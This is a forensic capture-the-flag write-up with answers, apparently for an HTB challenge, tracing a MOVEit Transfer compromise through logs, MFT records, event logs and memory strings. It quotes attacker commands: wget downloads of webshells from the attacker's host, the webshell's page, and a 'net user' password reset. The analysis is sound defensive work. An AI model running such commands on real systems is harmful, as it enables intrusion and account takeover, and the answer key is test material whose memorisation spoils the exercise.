i-like-to

Released: 2023-11-13
Retired: 2023-11-17
Author: sebh24

Scenario

We have unfortunately been hiding under a rock and do not see the many news articles referencing the recent MOVEit CVE being exploited in the wild. We believe our Windows server may be vulnerable and has recently fallen victim to this compromise. We need to understand this exploit in a bit more detail, confirm the actions of the attacker and retrieve some details so that we can implement them into our SOC environment. We have provided you with a triage of all the necessary artefacts from our compromised Windows server. PS: One of the artifacts is a memory dump, but we forgot to include the vmss file. You might have to go back to basics here…


Task 01

Question: Name of the ASPX webshell uploaded by the attacker?

Part of the triage data collected by KAPE is the ConsoleHost_history.txt file of the moveitsvc user. On Windows systems, this file (if it exists) is stored separately for each user in the directory %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline. It records everything entered into the PowerShell console; by default, the last 4,096 commands are saved.

cd C:\inetpub\wwwroot
wget http://10.255.254.3:9001/moveit.asp
dir
wget http://10.255.254.3:9001/moveit.asp -OutFile moveit.asp
dir
cd C:\MOVEitTransfer\wwwroot
wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx

Answer: move.aspx


Task 02

Question: What was the attacker’s IP address?

From the ConsoleHost_history.txt file mentioned in Task 01, the attacker’s IP address can also be determined, as the web shell was retrieved from a system under their control using the wget command.

Answer: 10.255.254.3


Task 03

Question: What user agent was used to perform the initial attack?

With the known IP address 10.255.254.3 and the known filename of the web shell move.aspx, it is possible to determine the user agent used by the attacker from the available IIS logs (u_ex230712.log). These logs are located by default under %SystemDrive%\inetpub\logs\LogFiles and are part of the triage data. The first requests from this IP begin on July 12, 2023, at 10:11:15, with the user agent *Nmap+Scripting+Engine* until 10:11:23, indicating that the system was scanned using nmap. Following that, a regular GET request is made from the same IP using a Firefox browser on a *Linux x86_64* system targeting the / path. This request receives an HTTP 302 redirect to /human.aspx, after which additional files for the website are requested. At 10:21:52, the user agent changes again: from this point onward, requests originate from a client identifying only as Ruby, sending various GET and POST requests repeatedly.

    2023-07-12 10:21:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 78
    [...]
    2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 818
    [...]
    2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 206
    2023-07-12 10:24:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 89
    [...]
    2023-07-12 10:24:52 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 131
    2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 494
    2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 677
    2023-07-12 10:24:55 10.10.0.25 POST /api/v1/token - 443 - 10.255.254.3 Ruby - 200 0 0 603
    2023-07-12 10:24:57 10.10.0.25 GET /api/v1/folders - 443 - 10.255.254.3 Ruby - 200 0 0 920

This request behavior is consistent with public reports regarding the MOVEit Transfer RCE (CVE-2023-34363), indicating that this was an attempted attack.

Answer: Ruby


Task 04

Question: When was the ASPX webshell uploaded by the attacker?

Also part of the triage data is a copy of the Master File Table ($MFT) of the NTFS file system. This table contains metadata for all existing (and some deleted) files on the disk. The $MFT can be converted into a more processable format (CSV, JSON) using MFTECmd by Eric Zimmerman. Entry 1,293 refers to the file move.aspx and shows a creation timestamp (shortened here) of 11:24:30 on July 12, 2023, which aligns with the previously established timeline.

{
    "EntryNumber": 1293,
    "ParentPath": ".\\MOVEitTransfer\\wwwroot",
    "FileName": "move.aspx",
    "FileSize": 1400,
    "Created0x10": "2023-07-12T11:24:30.4297594+00:00"
}

Answer: 12/07/2023 11:24:30


Task 05

Question: The attacker uploaded an ASP webshell which didn’t work, what is its filesize in bytes?

As seen in the previous task, the generated mft.json from the Master File Table (MFT) of the NTFS system also contains the file sizes of created and deleted files. From the ConsoleHost_history.txt in Task 01, the filename of the ASP web shell is known: moveit.asp. There are two entries for this file (IDs 100,896 and 273,729), indicating that the attacker made two attempts to save it. Both entries have different timestamps and file paths, but are otherwise identical.

{
    "EntryNumber": 100896,
    "ParentPath": ".\\MOVEitTransfer\\wwwroot",
    "FileName": "moveit.asp",
    "FileSize": 1362,
    "Created0x10": "2023-07-12T11:19:37.3316397+00:00"
}

Answer: 1362


Task 06

There appears to be a numbering error in the HTB task sequence, one task number is missing or skipped.


Task 07

Question: Which tool did the attacker use to initially enumerate the vulnerable server?

As already identified in Task 03 during the investigation of the initial attack, the IIS logs (u_ex230712.log) also contain requests with the user agent *Mozilla/5.0+(compatible;+Nmap+Scripting+Engine;+https://nmap.org/book/nse.html*, which identifies the tool used to enumerate the server.

Answer: nmap


Task 08

Question: We suspect the attacker may have changed the password for our service account. Please confirm the time this occurred (UTC)

In addition to the log files processed so far, the triage package also contains Windows Event Logs. These can be viewed and filtered in Windows using the Event Viewer. Alternatively, they can be converted to CSV or JSON using tools like EvtxECmd or aggregated and prefiltered for further use with hayabusa from Yamato-Security. Windows records attempted password changes made by a user with Event ID 4723 and attempted password resets with Event ID 4724 in the Security Log. Only one of the entries fits the known timeframe and the known user.

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
    <EventID>4724</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13824</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2023-07-12T11:09:27.8648235Z" />
    <EventRecordID>60772</EventRecordID>
    <Correlation ActivityID="{c2cb8fb7-9dd8-0001-2d90-cbc2d89dd901}" />
    <Execution ProcessID="652" ThreadID="8052" />
    <Channel>Security</Channel>
    <Computer>mover</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">moveitsvc</Data>
    <Data Name="TargetDomainName">MOVER</Data>
    <Data Name="TargetSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data>
    <Data Name="SubjectUserSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data>
    <Data Name="SubjectUserName">moveitsvc</Data>
    <Data Name="SubjectDomainName">MOVER</Data>
    <Data Name="SubjectLogonId">0x8d5ab</Data>
  </EventData>
</Event>

Answer: 12/07/2023 11:09:27


Task 09

Question: Which protocol did the attacker utilize to remote into the compromised machine?

In addition to the previously mentioned password changes, the Windows Event Log also records every user login with Event ID 4624. Different types of logins can be distinguished by the attribute LogonType, which (in short) are:

 `2` | Interactive: Password entry via keyboard or RUNAS
 `3` | Network: net use or PowerShell WinRM
 `5` | Service: Start of a service as a user
`10` | RemoteInteractive: Login via Terminal or RDP

Since the question relates to a remote connection, only events with LogonType 3 or 10 are relevant. For the known timeframe and the compromised user, three events are of interest (60,776; 60,793; and 60,794), all originating from the attacker’s IP. The last two events with LogonType=10 indicate a login via RDP.

[
    {
        "Timestamp": "2023-07-12 13:11:15.849 +02:00",
        "EventID": 4624,
        "RecordID": 60776,
        "RuleTitle": "Logon (Network)",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "3 - NETWORK"
        }
    },
    {
        "Timestamp": "2023-07-12 13:11:18.665 +02:00",
        "EventID": 4624,
        "RecordID": 60793,
        "RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "10 - REMOTE INTERACTIVE"
        }
    },
    {
        "Timestamp": "2023-07-12 13:11:18.665 +02:00",
        "EventID": 4624,
        "RecordID": 60794,
        "RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "10 - REMOTE INTERACTIVE"
        }
    }
]

Answer: RDP


Task 10

Question: Please confirm the date and time the attacker remotely accessed the compromised machine?

Using the events from the previous task, the exact time of the attacker’s remote access can be determined. The timestamp "Timestamp": "2023-07-12 13:11:18.665 +02:00" was rendered in the local time zone of the analysis system (UTC+2), so 2 hours must be subtracted from the displayed time to obtain the UTC time. This can be verified against the original event in the triage file: <TimeCreated SystemTime="2023-07-12T11:11:18.6654341Z" />

Answer: 12/07/2023 11:11:18
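The logon-type filtering of Task 09 and the UTC conversion of Task 10 combined, as an added example that is not part of the original write-up: it takes hayabusa-style JSON records, keeps only Event ID 4624 logons with a remote LogonType (3 or 10) from a given source IP, and normalises the local-time timestamps to UTC. The record list is constructed from the three events quoted above plus one local logon; the field names follow the JSON shown in Task 09.

```python
# Added example (not from the write-up). Events constructed from the
# hayabusa output quoted above plus one unrelated interactive logon.
from datetime import datetime, timezone

LOGON_TYPES = {2: "Interactive", 3: "Network", 5: "Service", 10: "RemoteInteractive (RDP)"}
REMOTE_TYPES = {3, 10}  # only these indicate a connection from another host

SAMPLE_EVENTS = [
    {"Timestamp": "2023-07-12 12:58:01.102 +02:00", "EventID": 4624, "RecordID": 60701,
     "Details": {"SrcIP": "-", "TgtUser": "Administrator", "Type": "2 - INTERACTIVE"}},
    {"Timestamp": "2023-07-12 13:11:15.849 +02:00", "EventID": 4624, "RecordID": 60776,
     "Details": {"SrcIP": "10.255.254.3", "TgtUser": "moveitsvc", "Type": "3 - NETWORK"}},
    {"Timestamp": "2023-07-12 13:11:18.665 +02:00", "EventID": 4624, "RecordID": 60793,
     "Details": {"SrcIP": "10.255.254.3", "TgtUser": "moveitsvc", "Type": "10 - REMOTE INTERACTIVE"}},
    {"Timestamp": "2023-07-12 13:11:18.665 +02:00", "EventID": 4624, "RecordID": 60794,
     "Details": {"SrcIP": "10.255.254.3", "TgtUser": "moveitsvc", "Type": "10 - REMOTE INTERACTIVE"}},
]

def to_utc(ts):
    """'2023-07-12 13:11:18.665 +02:00' -> '2023-07-12T11:11:18Z'
    (the UTC offset is applied, the fractional second dropped)."""
    local = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")
    return local.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

def logon_type(event):
    """Numeric LogonType from a Details.Type string such as '10 - REMOTE INTERACTIVE'."""
    return int(event["Details"]["Type"].split("-", 1)[0])

def remote_logons(events, src_ip, user=None):
    """Sorted (utc_time, record_id, logon_type_name, user) for every 4624 from
    src_ip whose LogonType is remote; `user` optionally narrows to one account."""
    hits = []
    for e in events:
        d = e["Details"]
        if e["EventID"] != 4624 or d["SrcIP"] != src_ip or (user and d["TgtUser"] != user):
            continue
        lt = logon_type(e)
        if lt in REMOTE_TYPES:
            hits.append((to_utc(e["Timestamp"]), e["RecordID"], LOGON_TYPES.get(lt, str(lt)), d["TgtUser"]))
    return sorted(hits)

def first_rdp_logon(events, src_ip):
    """UTC time of the earliest LogonType 10 (RDP) logon from src_ip, or None."""
    rdp = [h for h in remote_logons(events, src_ip) if h[2].startswith("RemoteInteractive")]
    return rdp[0][0] if rdp else None

if __name__ == "__main__":
    for hit in remote_logons(SAMPLE_EVENTS, "10.255.254.3"):
        print(*hit)
    print("first RDP logon (UTC):", first_rdp_logon(SAMPLE_EVENTS, "10.255.254.3"))
```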


Task 11

Question: What was the useragent that the attacker used to access the webshell?

With the known name of the web shell from Task 01 and the known IP address of the attacker from Task 02, access to the web shell can be identified in the IIS logs.

2023-07-12 11:24:43 10.10.0.25 GET /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 200 0 0 1179
2023-07-12 11:24:47 10.10.0.25 POST /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 https://moveit.htb/move.aspx 200 0 0 159

Answer: Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0


Task 12

Question: What is the inst ID of the attacker?

The artifact from the triage package not used so far, moveit.sql, is a MySQL 10.13 database dump of the service’s database. The dump can either be imported back into a database for further analysis or processed directly as text. Within it, there is a table named log that records all actions of the service. In the database dump, the INSERT statement for this table is on line 1,611 and contains the actions of the various instances. On the known day, 16 accesses are logged.

INSERT INTO `log` VALUES 
(40,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c66788d4d7ca1da7f57f2238b840663009cfcca8','',0,'','',40,0),
(41,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','f46377dcbb1bd462d0ba5bbd05ee7a7b6fa4335f','',0,'','',40,0),
(42,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','4cf54d4aa541ca00525e5ce8a4bff53da36faa29','',0,'','',40,0),
(43,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','de1128b8551c7b201b93d06c4e9499b437f55ae4','',0,'','',40,0),
(44,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','804fc0419b81ba9360ce0efe4bc14e238cb9ba86','',0,'','',40,0),
(45,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c745089b0778ac200e9d9e72fd6aa6defee6f0fd','',0,'','',40,0),
(50,'2023-07-12 02:25:03','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','b8e83822ff1d4578dd4908afb8c44f95bc3c8046','',966871855,'/Messages/Global Messaging','',10,0),
(51,'2023-07-12 02:25:55','sec_signon',3636,'vcjoaquq',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','1ec28c66956851f6060f28b17b60354911c5f390','',0,'','',10,0),
(52,'2023-07-12 02:26:15','sec_signon',3636,'icfshlla',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','e3b18a7f31a1578d044395b1a1e2f3671aff6bb5','',0,'','',10,0),
(57,'2023-07-12 02:47:11','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','9a483b59e0960ab38798ceea5900842e11b46216','',966871855,'/Messages/Global Messaging','',10,0),
(62,'2023-07-12 03:01:05','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','4076bf57319439239ea8f145fd3450f6f312542b','',966871855,'/Messages/Global Messaging','',10,0),
(67,'2023-07-12 03:01:56','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','af7dbfa81b0f63f6122e0a8aa736ec76d7cbc659','',966871855,'/Messages/Global Messaging','',10,0),
(72,'2023-07-12 03:04:43','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','189992f80c8b6e881fc18f48f46ab90da25e6e41','',966871855,'/Messages/Global Messaging','',10,0),
(77,'2023-07-12 03:06:42','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','ff49964e7ac34421ffb354279137a20d56e5d52f','',966871855,'/Messages/Global Messaging','',10,0),
(82,'2023-07-12 03:07:30','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','06b088eb422d27f7405ae0959b7a4d516745acb2','',966871855,'/Messages/Global Messaging','',10,0),
(87,'2023-07-12 03:08:37','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','f7d509bea8c67ed46f339f053fd0e648aad4088d','',966871855,'/Messages/Global Messaging','',10,0);

There are 8 accesses from instance 3636 and the remaining 8 from 1234. The first 8 are (failed) attempts to access the service via FTP. A Google search for InstID 1234 and the CVE yields multiple results, such as a proof of concept (PoC) by sfewer-r7 (in Ruby) and the Metasploit module (which references the aforementioned PoC).

Answer: 1234
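Processing the dump directly as text, as the task describes, is shown in the following added example (not code from the original write-up): it extracts the rows of the `log` table from a mysqldump file and groups them by InstID, client and outcome. The dump excerpt is constructed from the rows quoted above, cut to their first 15 columns, with the obfuscated guest address replaced by a placeholder; the column positions (InstID at index 3, IP at 7, message at 13, client at 14) are an assumption read off those rows.

```python
# Added example (not from the write-up). Dump excerpt constructed from the
# rows quoted above, truncated to 15 columns; guest e-mail is a placeholder.
import ast
from collections import Counter

DUMP = """\
-- MySQL dump (constructed excerpt)
INSERT INTO `log` VALUES
(40,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP'),
(41,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP'),
(50,'2023-07-12 02:25:03','msg_post',1234,'Guest:user@placeholder.example',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby'),
(51,'2023-07-12 02:25:55','sec_signon',3636,'vcjoaquq',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser'),
(57,'2023-07-12 02:47:11','msg_post',1234,'Guest:user@placeholder.example',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby'),
(99,'2023-07-11 09:00:00','sec_signon',1,'alice',0,'','10.10.0.50',0,'','','','','Signed on','Firefox Browser');
INSERT INTO `users` VALUES (1,'alice');
"""
# Assumed column positions, read off the rows quoted in the write-up.
COLS = {"id": 0, "time": 1, "action": 2, "inst_id": 3, "user": 4, "ip": 7, "message": 13, "client": 14}

def table_rows(dump_text, table):
    """Rows of `table` as Python tuples. mysqldump writes single-quoted strings
    with backslash escapes, which ast.literal_eval accepts unchanged; a dump
    using doubled quotes ('') would need a real SQL tokenizer instead."""
    rows, buf, prefix = [], [], f"INSERT INTO `{table}` VALUES"
    for line in dump_text.splitlines():
        if line.startswith(prefix):
            buf = [line[len(prefix):]]       # statement may span many lines
        elif buf:
            buf.append(line)
        if buf and line.rstrip().endswith(";"):
            values = "\n".join(buf).strip().rstrip(";")
            rows.extend(ast.literal_eval("[" + values + "]"))
            buf = []
    return rows

def accesses_on(rows, day, ip=None):
    """Rows logged on `day` (YYYY-MM-DD), optionally only from `ip`."""
    return [r for r in rows
            if r[COLS["time"]].startswith(day) and (ip is None or r[COLS["ip"]] == ip)]

def by_inst_id(rows):
    """InstID -> number of rows, e.g. 3636 and 1234 in the write-up."""
    return Counter(r[COLS["inst_id"]] for r in rows)

def summarize(rows):
    """(InstID, client, action, message) -> count, to see what each instance did."""
    return Counter((r[COLS["inst_id"]], r[COLS["client"]], r[COLS["action"]], r[COLS["message"]])
                   for r in rows)

if __name__ == "__main__":
    day = accesses_on(table_rows(DUMP, "log"), "2023-07-12", "10.255.254.3")
    print(by_inst_id(day))
    for key, n in summarize(day).items():
        print(n, *key)
```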


Task 13

Question: What command was run by the attacker to retrieve the webshell?

The command is visible in the ConsoleHost_history.txt used in Task 01.

Answer: wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx


Task 14

Question: What was the string within the title header of the webshell deployed by the TA?

Since there is no VMSS file available for the VMEM image (see scenario description), advanced memory analysis cannot be performed. However, all strings can be extracted and searched from the dump using the strings command. To find the title of the web shell, you can search for the filename move.aspx known from Task 01. One of the hits also contains the title of the web shell.

<HTML>
    <HEAD>
        <title>awen asp.net webshell</title>
    </HEAD>
    <body >
        <form name="cmd" method="post" action="./move.aspx" id="cmd">
            <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MjA0MDg4ODhkZNVOZ3tV2TCTi+hEkha/q+A+5xP6tvrMtJaEupnndGLi" />
            <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="678AED88" />
            <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAANhi3zf7ocw6tYhjdSr5BwWitssAmaVIY7AayhB9duwcnk2JDuMxrvKtMBUSvskgfEkJOF+BOsGxdOjAd7jGUjGbwkQ2wl4sKonDxvg+iiKWg==" />
            <input name="txtArg" type="text" value="whoami" id="txtArg" style="width:250px;Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" />
            <input type="submit" name="testing" value="excute" id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" />
            <span id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px">Command:</span>
        </form>
    </body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->

Based on the comments at the end of the file, the web shell can be identified as a publicly known ASPX web shell; a copy of it can be found, for example, in the BlackArch repository on GitHub.

Answer: awen asp.net webshell


Task 15

Question: What did the TA change our moveitsvc account password to?

The strings extracted from the VMEM image can be used to search for keywords indicating a password change. These include the username moveitsvc (12,837 hits), the command net user (75 hits), which can be used to modify user accounts, and the PowerShell cmdlet Set-LocalUser (1 hit). However, there is only one combined hit containing both net user and moveitsvc, which corresponds to the attacker’s command.

net user "moveitsvc" 5trongP4ssw0rd

Answer: 5trongP4ssw0rd